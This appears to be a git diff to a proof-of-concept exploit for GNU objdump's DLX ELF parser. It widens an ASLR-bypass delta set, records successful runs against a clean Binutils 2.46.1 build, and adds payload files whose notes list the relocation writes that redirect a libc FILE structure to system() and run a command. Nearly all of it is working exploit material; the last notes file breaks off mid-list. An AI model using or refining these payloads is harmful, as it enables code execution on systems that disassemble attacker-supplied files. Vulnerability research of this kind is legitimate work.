diff --git a/objdump-dlx-calc-poc/README.md b/objdump-dlx-calc-poc/README.md
index 4ba00cf..ed072d0 100644
--- a/objdump-dlx-calc-poc/README.md
+++ b/objdump-dlx-calc-poc/README.md
@@ -28,6 +28,7 @@ elf32-dlx
 - `dlx_chain_builder.py` - small builder used by the generator
 - `docs/aslr-bypass-analysis.md` - notes on why this is profile-dependent
 - `tools/search_pointer_transform.py` - Z3 sanity check for fixed pointer transforms
+- `tools/aslr_delta_coverage.py` - lists the libc low-32 delta coverage used by the generator
 The payload files are named `.bin` because they are raw binary files, but the file format inside is ELF/DLX.
@@ -43,22 +44,31 @@ relative offsets observed in the target process:
 ```text
 layout=wsl2404 off_io=-0x3690 off_sec=0xbb0 rbase=0x220 buf_delta=0x702fff00 or 0x6f300000
-system_delta=0x7042e500 or 0x7043e4ff
+system_delta=0x7042e500, 0x6f42e600, 0x7043e4ff, 0x6f43e5ff, 0x7043e5ff, or 0x6f43e6ff
 layout=gnu2461 off_io=-0x3690 off_sec=0xbb8 rbase=0x190 sec_size_offset=0x40 buf_delta=0x702fff00 or 0x6f300000
-system_delta=0x7042e500 or 0x7043e4ff
+system_delta=0x7042e500, 0x6f42e600, 0x7043e4ff, 0x6f43e5ff, 0x7043e5ff, or 0x6f43e6ff
 ```
-That is an ASLR-on relative-delta strategy, not a universal single-shot info-leak bypass. A miss can still happen, so the runner keeps the retry loop.
+That is an ASLR-on relative-delta strategy, not a universal single-shot info-leak bypass. The six `system_delta` values cover every page-aligned low-32-bit libc base for the documented `_IO_2_1_stderr_` and `system` offsets. A miss can still happen if the heap/libio profile or libc build does not match, so the runner keeps the retry loop. More detail is in `docs/aslr-bypass-analysis.md`.
-The `gnu2461` profile was validated with the existing runner:
+The expanded `gnu2461` profile was validated with the existing runner against a
+clean GNU Binutils 2.46.1 `dlx-elf` objdump build:
 ```text
-HIT try=1 payload=.../payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s7042e500.bin
-CALC_HELPER_RAN 2026-06-25T11:14:27Z
+HIT try=1 payload=payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s7042e500.bin
+CALC_HELPER_RAN 2026-06-25T11:19:07Z
+```
+
+A ten-run one-sweep stability pass against the same clean build also hit every
+run:
+
+```text
+hits=10/10
+CALC_HELPER_RAN 2026-06-25T11:19:31Z
 ```
 So a plain crash like this does not always mean the PoC failed:
diff --git a/objdump-dlx-calc-poc/docs/aslr-bypass-analysis.md b/objdump-dlx-calc-poc/docs/aslr-bypass-analysis.md
index 15df6a9..2583658 100644
--- a/objdump-dlx-calc-poc/docs/aslr-bypass-analysis.md
+++ b/objdump-dlx-calc-poc/docs/aslr-bypass-analysis.md
@@ -24,7 +24,7 @@ off_io=-0x3690
 off_sec=0xbb0
 rbase=0x220
 buf_delta=0x702fff00 or 0x6f300000
-system_delta=0x7042e500 or 0x7043e4ff
+system_delta=0x7042e500, 0x6f42e600, 0x7043e4ff, 0x6f43e5ff, 0x7043e5ff, or 0x6f43e6ff
 ```
 The `gnu2461` profile uses:
@@ -35,7 +35,7 @@ off_sec=0xbb8
 sec_size_offset=0x40
 rbase=0x190
 buf_delta=0x702fff00 or 0x6f300000
-system_delta=0x7042e500 or 0x7043e4ff
+system_delta=0x7042e500, 0x6f42e600, 0x7043e4ff, 0x6f43e5ff, 0x7043e5ff, or 0x6f43e6ff
 ```
 The 2.46.1 profile differs because the relocation cache array moved from
@@ -43,6 +43,34 @@ The 2.46.1 profile differs because the relocation cache array moved from
 to `data+0xbb8`, and the `bfd_section.size` field used to widen generic relocation range checks is at section offset `0x40`.
+## Fixed delta coverage
+
+The `FILE+0x68` field starts as a libc pointer to `_IO_2_1_stderr_`. The
+payload uses a 32-bit big-endian relocation add to turn that low 32-bit value
+into the low 32 bits of `system`.
+
+The previous payload set included two deltas. For the documented offsets:
+
+```text
+_IO_2_1_stderr_ offset = 0x2044e0
+system offset = 0x58750
+```
+
+there are six possible deltas over all page-aligned low-32-bit libc bases:
+
+```text
+0x7042e500 pages=703488 coverage=0.670898 cumulative=0.670898
+0x6f42e600 pages=235520 coverage=0.224609 cumulative=0.895508
+0x7043e4ff pages=82620 coverage=0.078793 cumulative=0.974300
+0x6f43e5ff pages=26520 coverage=0.025291 cumulative=0.999592
+0x7043e5ff pages=324 coverage=0.000309 cumulative=0.999901
+0x6f43e6ff pages=104 coverage=0.000099 cumulative=1.000000
+```
+
+`tools/aslr_delta_coverage.py` reproduces that table. This is better coverage
+for the libc low-32 portion of the bypass, not a claim that the heap/libio
+profile is universal.
+
 ## Why argv two-stage is not enough
 A deterministic leak-then-exploit route would need this sequence in one
diff --git a/objdump-dlx-calc-poc/generate_objdump_dlx_calc_poc.py b/objdump-dlx-calc-poc/generate_objdump_dlx_calc_poc.py
index faf2348..ed2252b 100644
--- a/objdump-dlx-calc-poc/generate_objdump_dlx_calc_poc.py
+++ b/objdump-dlx-calc-poc/generate_objdump_dlx_calc_poc.py
@@ -28,7 +28,14 @@ SECTION_SIZE_HIGH = OFF_SEC + 0x3C
 BUF_TO_FILE_BE32_DELTAS = (0xEF210000, 0xF020FF00)
 WIDE_TO_FAKE_BE32_DELTAS = (0x4FFF0000,)
-STDERR_TO_SYSTEM_BE32_DELTAS = (0x7042E500, 0x7043E4FF)
+STDERR_TO_SYSTEM_BE32_DELTAS = (
+ 0x7042E500,
+ 0x6F42E600,
+ 0x7043E4FF,
+ 0x6F43E5FF,
+ 0x7043E5FF,
+ 0x6F43E6FF,
+)
 FILE_JUMPS_TO_WFILE_OVERFLOW_FINISH_BE16 = 0x0002
 LAYOUTS = (
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f42e600.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f42e600.bin
new file mode 100644
index 0000000..2502321
Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f42e600.bin differ
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f42e600.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f42e600.notes
new file mode 100644
index 0000000..9c30314
--- /dev/null
+++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f42e600.notes
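Review bot: The expanded `STDERR_TO_SYSTEM_BE32_DELTAS` tuple carries six magic values with no comment recording where they come from, so the generator cannot be checked against its inputs without opening `docs/aslr-bypass-analysis.md`. The docs hunk in this commit says the set follows from the documented `_IO_2_1_stderr_` offset `0x2044e0` and `system` offset `0x58750` and that `tools/aslr_delta_coverage.py` reproduces the table, so a one-line header above the tuple, e.g. `# Derived from _IO_2_1_stderr_=0x2044e0 / system=0x58750; regenerate with tools/aslr_delta_coverage.py`, would keep that dependency next to the constants. The README hunk also states the set is tied to the documented libc build, which is worth repeating on the constant so a later offset change is not silently left behind.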
@@ -0,0 +1,34 @@
+layout=gnu2461
+flag_byte4=0x05
+buf_delta=0x6f300000
+wide_delta=0x4fff0000
+system_delta=0x6f42e600
+command=P
+off_io=-0x3690 off_sec=0xbb8 rbase=0x190
+sec_size_offset=0x40
+
+000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2
+001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3
+002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
+003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2
+004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3
+005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
+006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8
+007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8
+008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc
+009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc
+010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2
+011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3
+012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable
+013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
+014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3
+015 target=-0x3628 sym=0x6f42e600 FILE+0x68 _IO_2_1_stderr_ -> system
+016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2
+017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3
+018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
+019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2
+020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3
+021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
+022 target=0x0 sym=0x00000000 pad R_DLX_NONE
+023 target=0x0 sym=0x00000000 pad R_DLX_NONE
+024 target=0x0 sym=0x00000000 pad R_DLX_NONE
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f43e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f43e5ff.bin
new file mode 100644
index 0000000..fe5f171
Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f43e5ff.bin differ
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f43e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f43e5ff.notes
new file mode 100644
index 0000000..338ed11
--- /dev/null
+++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f43e5ff.notes
@@ -0,0 +1,34 @@
+layout=gnu2461
+flag_byte4=0x05
+buf_delta=0x6f300000
+wide_delta=0x4fff0000
+system_delta=0x6f43e5ff
+command=P
+off_io=-0x3690 off_sec=0xbb8 rbase=0x190
+sec_size_offset=0x40
+
+000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2
+001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3
+002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
+003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2
+004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3
+005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
+006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8
+007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8
+008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc
+009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc
+010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2
+011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3
+012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable
+013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
+014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3
+015 target=-0x3628 sym=0x6f43e5ff FILE+0x68 _IO_2_1_stderr_ -> system
+016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2
+017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3
+018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
+019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2
+020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3
+021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
+022 target=0x0 sym=0x00000000 pad R_DLX_NONE
+023 target=0x0 sym=0x00000000 pad R_DLX_NONE
+024 target=0x0 sym=0x00000000 pad R_DLX_NONE
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f43e6ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f43e6ff.bin
new file mode 100644
index 0000000..088ecfa
Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f43e6ff.bin differ
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f43e6ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f43e6ff.notes
new file mode 100644
index 0000000..1662f26
--- /dev/null
+++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f43e6ff.notes
@@ -0,0 +1,34 @@
+layout=gnu2461
+flag_byte4=0x05
+buf_delta=0x6f300000
+wide_delta=0x4fff0000
+system_delta=0x6f43e6ff
+command=P
+off_io=-0x3690 off_sec=0xbb8 rbase=0x190
+sec_size_offset=0x40
+
+000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2
+001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3
+002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
+003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2
+004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3
+005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
+006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8
+007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8
+008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc
+009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc
+010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2
+011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3
+012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable
+013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
+014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3
+015 target=-0x3628 sym=0x6f43e6ff FILE+0x68 _IO_2_1_stderr_ -> system
+016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2
+017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3
+018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
+019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2
+020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3
+021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
+022 target=0x0 sym=0x00000000 pad R_DLX_NONE
+023 target=0x0 sym=0x00000000 pad R_DLX_NONE
+024 target=0x0 sym=0x00000000 pad R_DLX_NONE
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s7043e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s7043e5ff.bin
new file mode 100644
index 0000000..a4ae616
Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s7043e5ff.bin differ
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s7043e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s7043e5ff.notes
new file mode 100644
index 0000000..84b0976
--- /dev/null
+++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s7043e5ff.notes
@@ -0,0 +1,34 @@
+layout=gnu2461
+flag_byte4=0x05
+buf_delta=0x6f300000
+wide_delta=0x4fff0000
+system_delta=0x7043e5ff
+command=P
+off_io=-0x3690 off_sec=0xbb8 rbase=0x190
+sec_size_offset=0x40
+
+000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2
+001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3
+002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
+003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2
+004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3
+005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
+006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8
+007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8
+008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc
+009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc
+010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2
+011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3
+012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable
+013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
+014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3
+015 target=-0x3628 sym=0x7043e5ff FILE+0x68 _IO_2_1_stderr_ -> system
+016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2
+017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3
+018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
+019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2
+020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3
+021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
+022 target=0x0 sym=0x00000000 pad R_DLX_NONE
+023 target=0x0 sym=0x00000000 pad R_DLX_NONE
+024 target=0x0 sym=0x00000000 pad R_DLX_NONE
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f42e600.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f42e600.bin
new file mode 100644
index 0000000..1b682a9
Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f42e600.bin differ
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f42e600.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f42e600.notes
new file mode 100644
index 0000000..ded9e2b
--- /dev/null
+++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f42e600.notes
@@ -0,0 +1,34 @@
+layout=gnu2461
+flag_byte4=0x05
+buf_delta=0x702fff00
+wide_delta=0x4fff0000
+system_delta=0x6f42e600
+command=P
+off_io=-0x3690 off_sec=0xbb8 rbase=0x190
+sec_size_offset=0x40
+
+000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2
+001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3
+002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
+003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2
+004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3
+005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
+006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8
+007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8
+008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc
+009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc
+010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2
+011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3
+012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable
+013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
+014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3
+015 target=-0x3628 sym=0x6f42e600 FILE+0x68 _IO_2_1_stderr_ -> system
+016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2
+017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3
+018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
+019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2
+020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3
+021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
+022 target=0x0 sym=0x00000000 pad R_DLX_NONE
+023 target=0x0 sym=0x00000000 pad R_DLX_NONE
+024 target=0x0 sym=0x00000000 pad R_DLX_NONE
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f43e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f43e5ff.bin
new file mode 100644
index 0000000..8f5ab73
Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f43e5ff.bin differ
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f43e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f43e5ff.notes
new file mode 100644
index 0000000..056e0d2
--- /dev/null
+++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f43e5ff.notes
@@ -0,0 +1,34 @@
+layout=gnu2461
+flag_byte4=0x05
+buf_delta=0x702fff00
+wide_delta=0x4fff0000
+system_delta=0x6f43e5ff
+command=P
+off_io=-0x3690 off_sec=0xbb8 rbase=0x190
+sec_size_offset=0x40
+
+000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2
+001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3
+002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
+003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2
+004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3
+005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
+006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8
+007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8
+008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc
+009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc
+010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2
+011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3
+012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable
+013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
+014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3
+015 target=-0x3628 sym=0x6f43e5ff FILE+0x68 _IO_2_1_stderr_ -> system
+016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2
+017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3
+018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
+019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2
+020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3
+021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
+022 target=0x0 sym=0x00000000 pad R_DLX_NONE
+023 target=0x0 sym=0x00000000 pad R_DLX_NONE
+024 target=0x0 sym=0x00000000 pad R_DLX_NONE
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f43e6ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f43e6ff.bin
new file mode 100644
index 0000000..7c5ed70
Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f43e6ff.bin differ
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f43e6ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f43e6ff.notes
new file mode 100644
index 0000000..0677195
--- /dev/null
+++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f43e6ff.notes
@@ -0,0 +1,34 @@
+layout=gnu2461
+flag_byte4=0x05
+buf_delta=0x702fff00
+wide_delta=0x4fff0000
+system_delta=0x6f43e6ff
+command=P
+off_io=-0x3690 off_sec=0xbb8 rbase=0x190
+sec_size_offset=0x40
+
+000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2
+001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3
+002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
+003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2
+004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3
+005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
+006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8
+007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8
+008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc
+009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc
+010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2
+011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3
+012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable
+013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
+014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3
+015 target=-0x3628 sym=0x6f43e6ff FILE+0x68 _IO_2_1_stderr_ -> system
+016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2
+017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3
+018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
+019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2
+020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3
+021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
+022 target=0x0 sym=0x00000000 pad R_DLX_NONE
+023 target=0x0 sym=0x00000000 pad R_DLX_NONE
+024 target=0x0 sym=0x00000000 pad R_DLX_NONE
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s7043e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s7043e5ff.bin
new file mode 100644
index 0000000..4c4baf7
Binary files /dev/null and b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s7043e5ff.bin differ
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s7043e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s7043e5ff.notes
new file mode 100644
index 0000000..9b25b47
--- /dev/null
+++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s7043e5ff.notes
@@ -0,0 +1,34 @@
+layout=gnu2461
+flag_byte4=0x05
+buf_delta=0x702fff00
+wide_delta=0x4fff0000
+system_delta=0x7043e5ff
+command=P
+off_io=-0x3690 off_sec=0xbb8 rbase=0x190
+sec_size_offset=0x40
+
+000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2
+001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3
+002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
+003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2
+004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3
+005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
+006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8
+007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8
+008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc
+009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc
+010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2
+011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3
+012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable
+013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
+014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3
+015 target=-0x3628 sym=0x7043e5ff FILE+0x68 _IO_2_1_stderr_ -> system
+016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2
+017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3
+018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
+019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2
+020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3
+021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
+022 target=0x0 sym=0x00000000 pad R_DLX_NONE
+023 target=0x0 sym=0x00000000 pad R_DLX_NONE
